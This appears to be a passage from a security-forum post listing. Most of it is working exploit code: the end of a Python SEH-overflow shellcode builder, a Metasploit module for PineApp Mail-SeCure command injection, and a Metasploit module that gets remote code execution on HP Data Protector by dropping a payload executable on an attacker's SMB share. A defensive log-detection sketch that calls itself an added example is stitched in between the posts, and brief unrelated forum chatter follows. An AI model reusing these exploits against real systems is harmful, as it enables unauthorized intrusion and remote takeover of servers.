"\x56\x51\x4c\x4b\x52\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b\x4b" "\x4e\x44\x4e\x36\x52\x4a\x4a\x43\x58\x39\x36\x4d\x45\x4f\x4d" "\x4d\x4d\x4b\x4f\x4e\x35\x57\x4c\x55\x56\x53\x4c\x34\x4a\x4d" "\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x51\x57\x52\x33" "\x32\x52\x32\x4f\x32\x4a\x43\x30\x31\x43\x4b\x4f\x39\x45\x35" "\x33\x45\x31\x42\x4c\x35\x33\x46\x4e\x42\x45\x33\x48\x42\x45" "\x33\x30\x41\x41" ) trailer = "\x90" * (2000 - len(junk + nseh + seh + padding + shellcode)) + "\"\n\n" buffer = header + junk + nseh + seh + padding + shellcode + trailer textfile = open("exploit.reg" , 'w') textfile.write(buffer) 
textfile.close() print "[*] Done"
  20. Description : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## Author : metasploit Source : PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution Code : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the test_li_connection.php component, due to the insecure usage of the system() php function. This module has been tested successfully on PineApp Mail-SeCure 3.70. }, 'Author' => [ 'Dave Weinstein', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-188/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python telnet' } }, 'Targets' => [ [ 'PineApp Mail-SeCure 3.70', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 26 2013' )) register_options( [ Opt::RPORT(7443) ], self.class ) end def my_uri return normalize_uri("/admin/test_li_connection.php") end def get_cookies res = send_request_cgi({ 'uri' => my_uri, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to start the session 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1" # In order to make things as fast as possible } }) if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ 
/SESSIONID/ return res.get_cookies else return nil end end def check # Since atm of writing this exploit there isn't patch available, # checking for the vulnerable component should be a reliable test. cookies = get_cookies if cookies.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit print_status("#{rhost}:#{rport} - Retrieving session cookie...") cookies = get_cookies if cookies.nil? fail_with(Exploit::Failure::Unknown, "Failed to retrieve the session cookie") end print_status("#{rhost}:#{rport} - Executing payload...") send_request_cgi({ 'uri' => my_uri, 'cookie' => cookies, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to trigger the vulnerability 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1;#{payload.encoded}" } }) end end
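A detection sketch for the request pattern in the module above, as an added example that is not part of the original post or of Metasploit. It assumes the appliance's web requests are available in combined access-log format; the log lines are constructed samples and the function name is hypothetical. It flags any request to test_li_connection.php whose iptest value is not a plain IPv4 address or hostname.

```javascript
// Constructed sample access-log lines (not taken from the original post).
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Aug/2013:10:00:01 +0000] "GET /admin/test_li_connection.php?actiontest=1&idtest=abcde&iptest=127.0.0.1 HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Aug/2013:10:00:07 +0000] "GET /admin/test_li_connection.php?actiontest=1&idtest=QwErT&iptest=127.0.0.1%3Bid HTTP/1.1" 200 498',
  '10.0.0.5 - - [01/Aug/2013:10:00:09 +0000] "GET /admin/index.php HTTP/1.1" 200 2048',
];

// Allowlist for what a connection-test target should look like.
const IPV4 = /^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$/;
const HOSTNAME = /^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;

// Returns one record per iptest value that fails the allowlist.
function findSuspiciousIptest(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    let url;
    try {
      // The base is a placeholder so the relative request target can be parsed.
      url = new URL(m[1], 'https://placeholder.invalid');
    } catch {
      continue;
    }
    if (!url.pathname.endsWith('/test_li_connection.php')) continue;
    // searchParams percent-decodes, so %3B is compared as ';'.
    for (const value of url.searchParams.getAll('iptest')) {
      if (!IPV4.test(value) && !HOSTNAME.test(value)) {
        hits.push({ client: line.split(' ')[0], iptest: value });
      }
    }
  }
  return hits;
}
```

The same allowlist applied server-side, before the value reaches system(), is the corresponding input check.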
  21. Description : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## # Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability # Date: 2012-13-07 # Exploit Author: Ben Turner, Doug McLeod # Vendor Homepage: HP - United States | Laptop Computers, Desktops , Printers, Servers and more # Version: 6.10 & 6.11 & 6.20 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0922 # Notes: ZDI-11-056 # Reference: Zero Day Initiative # Reference: HPSBMA02654 SSRT100441 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code - c02781143 - HP Business Support Center Author : Ben Turner Source : HP Data Protector CMD Install Service Vulnerability (msf) Code : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'HP Data Protector CMD Install Service Vulnerability', 'Description' => %Q{ This module exploits HP Data Protector omniinet process on Windows only. This invokes the install service function that allows for a reverse tcp payload to your host. To ensure this works, the SMB server must have a share called Omniback which has a subfolder i386, i.e. 
\\\\192.168.1.1\\Omniback\\i386\\ }, 'Author' => [ 'Ben Turner', 'Doug McLeod' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'HP Data Protector 6.10/6.11/6.20 on Windows', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'July 29 2013' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server which hosts your share.', 'IPAddress']), Opt::RPORT(5555), ], self.class) end def exploit lhost = "#{datastore['SMBServer']}" lhostfull = "" lhost.each_char do |character| lhostfull = lhostfull << "\x00" << character end shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20" shellcode << lhostfull shellcode << "\x00\x00\x00\x20\x00\x30\x00" shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00" shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00" shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00" shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00" shellcode << "\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00" shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00" shellcode << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00" shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00" shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62" shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x5c\x00\x5c\x00\x4f\x00" shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00" shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00" shellcode << 
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00" shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00" shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00" shellcode << "\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54" shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00" shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00" shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback") exe = generate_payload_exe fd = smb_open("\\i386\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share for: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...\n") self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback") file = "\\i386\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good(" Found, 
upload was succesful! \\\\#{datastore['SMBServer']}\\Omniback\\#{file}") else print_error("\\\\#{datastore['SMBServer']}\\Omniback\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(shellcode) print_status("Waiting ...") print_good("Sent Good Luck") rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end handler #disconnect end end
  22. Or shareimage.ro
  23. What are you doing, man? Where do you think you are? On your Counter-Strike and Metin forum? You made 5 posts with gg gg gg bv gj. Get back to your own yard.
  24. Very good suggestion; there is an old topic here: https://rstforums.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst
  25. Yesterday morning it didn't really work for me either; I think it was a DDoS or something, but today it worked fine.